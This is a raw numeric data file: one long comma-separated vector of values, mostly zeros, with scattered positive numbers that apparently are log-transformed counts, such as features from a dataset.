0.0, 0.0, 3.6375861597263857, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 18.767037148656488, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.584967478670572, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 3.2188758248682006, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 4.0943445622221, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.711235389328078, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.367295829986474, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.9512437185814275, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0, 0.0, 3.2188758248682006, 0.0, 0, 0, 0, 3.1354942159291497, 3.800574088041945, 0, 0.0, 0.0, 0.0, 0, 4.969640753475787, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0, 4.631631038266565, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.833213344056216, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.3322045101752034, 0.0, 0.0, 3.8918202981106265, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.367295829986474, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.41610040220442, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.833213344056216, 0, 0.0, 0, 3.58351893845611, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.553876891600541, 0, 0.0, 3.367295829986474, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9120230054281455, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.800574088041945, 0, 0.0, 0, 0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 3.295836866004329, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.6635616461296467, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0, 0, 0.0, 5.204006687076795, 0.0, 0.0, 8.61362370353681, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.4849066497880004, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.7412592803704001, 0, 0.0, 0, 2.550898738446989, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.044522437723423, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.44274094706523, 5.679743138077019, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 